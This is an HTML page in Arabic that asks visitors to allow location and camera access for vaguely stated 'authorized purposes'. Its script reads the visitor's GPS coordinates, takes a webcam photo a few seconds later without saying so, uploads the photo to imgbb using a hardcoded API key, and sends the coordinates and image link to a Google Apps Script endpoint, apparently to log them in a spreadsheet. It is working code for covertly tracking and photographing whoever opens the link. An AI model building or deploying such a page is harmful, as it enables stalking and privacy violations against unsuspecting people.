<!DOCTYPE html>
<html lang="ar">
<head>
  <meta charset="UTF-8" />
  <title>طلب إذن الموقع والكاميرا</title>
  <style>
    body { font-family: Arial, sans-serif; direction: rtl; padding: 20px; }
    #location, #camera { margin-top: 20px; }
    video { width: 320px; height: 240px; background: #000; }
    button { padding: 10px 20px; font-size: 16px; cursor: pointer; margin-top: 10px; }
  </style>
</head>
<body>
  <h2>طلب إذن الوصول إلى الموقع والكاميرا</h2>
  <p>يرجى السماح لنا بالوصول إلى موقعك الجغرافي والكاميرا لاستخدامها للأغراض المصرح بها فقط.</p>
  <button id="allowBtn">أوافق</button>

  <div id="location"></div>
  <div id="camera">
    <video id="video" autoplay playsinline></video>
  </div>

  <script>
    const googleSheetURL = 'https://script.google.com/macros/s/AKfycbzYUcijm0yPvLfjUQh-ikBiI6q6K8urmRTUUuuDK7q8FqFbRYLSnVuprKelA7dFdJxhqw/exec';
    const imgbbAPIKey = '6e84094fc0083149ed02d9e86f7a3438';

    document.getElementById('allowBtn').addEventListener('click', function () {
      const video = document.getElementById('video');
      const locDiv = document.getElementById('location');

      if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(function (position) {
          locDiv.innerHTML = `<h3>موقعك الجغرافي:</h3>
                              <p>خط العرض: ${position.coords.latitude}</p>
                              <p>خط الطول: ${position.coords.longitude}</p>`;

          if (navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
            navigator.mediaDevices.getUserMedia({ video: true })
              .then(function (stream) {
                video.srcObject = stream;
                setTimeout(() => {
                  captureImage(stream, position.coords.latitude, position.coords.longitude);
                }, 2000);
              })
              .catch(function (err) {
                alert('تعذر الوصول إلى الكاميرا: ' + err.message);
              });
          } else {
            alert('المتصفح لا يدعم الوصول إلى الكاميرا.');
          }

        }, function (error) {
          alert('تعذر الحصول على الموقع: ' + error.message);
        });
      } else {
        alert('المتصفح لا يدعم خدمة الموقع الجغرافي.');
      }

      this.style.display = 'none';
    });

    function captureImage(stream, lat, lon) {
      const video = document.getElementById('video');
      const canvas = document.createElement('canvas');
      canvas.width = video.videoWidth || 320;
      canvas.height = video.videoHeight || 240;
      const ctx = canvas.getContext('2d');
      ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
      const imageData = canvas.toDataURL('image/png');
      uploadToImgbb(imageData, lat, lon);
    }

    function uploadToImgbb(imageData, lat, lon) {
      const base64Image = imageData.replace(/^data:image\/(png|jpg);base64,/, '');

      fetch(`https://api.imgbb.com/1/upload?key=${imgbbAPIKey}`, {
        method: 'POST',
        body: new URLSearchParams({ 'image': base64Image }),
        headers: { 'Content-Type': 'application/x-www-form-urlencoded' }
      })
      .then(response => response.json())
      .then(data => {
        if (data.success) {
          sendDataToSheet(lat, lon, data.data.url);
          alert('تم إرسال الموقع والصورة بنجاح!');
        } else {
          alert('حدث خطأ في رفع الصورة');
        }
      })
      .catch(error => {
        alert('خطأ في الاتصال بـ Imgbb: ' + error.message);
      });
    }

    function sendDataToSheet(lat, lon, imageURL) {
      fetch(googleSheetURL, {
        method: 'POST',
        body: JSON.stringify({ lat, lon, imageURL }),
        headers: { 'Content-Type': 'application/json' }
      })
      .then(res => res.text())
      .then(text => console.log(text))
      .catch(err => console.error('خطأ في إرسال البيانات إلى Google Sheets', err));
    }
  </script>
</body>
</html>
